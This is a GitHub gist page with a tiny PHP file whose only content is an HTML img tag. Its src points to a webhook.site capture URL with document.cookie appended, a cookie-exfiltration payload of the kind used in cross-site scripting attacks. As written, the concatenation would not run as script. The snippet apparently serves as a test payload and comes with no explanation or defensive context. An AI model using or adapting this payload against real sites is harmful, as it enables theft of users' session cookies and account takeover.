Skip to content

Instantly share code, notes, and snippets.

@jmmeacham
Last active September 17, 2019 16:41
Show Gist options
  • Save jmmeacham/73eb1b515f9ba0c58bca16d2db99a15d to your computer and use it in GitHub Desktop.
Save jmmeacham/73eb1b515f9ba0c58bca16d2db99a15d to your computer and use it in GitHub Desktop.
<?php
$html = <<<EOF
<!-- Your HTML goes here! -->
<img src="http://webhook.site/8b66c8d2-dd5a-48e4-a0bf-80a99b606387"+(document.cookie||"nocookie!")/>
EOF;
echo $html;
?>
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment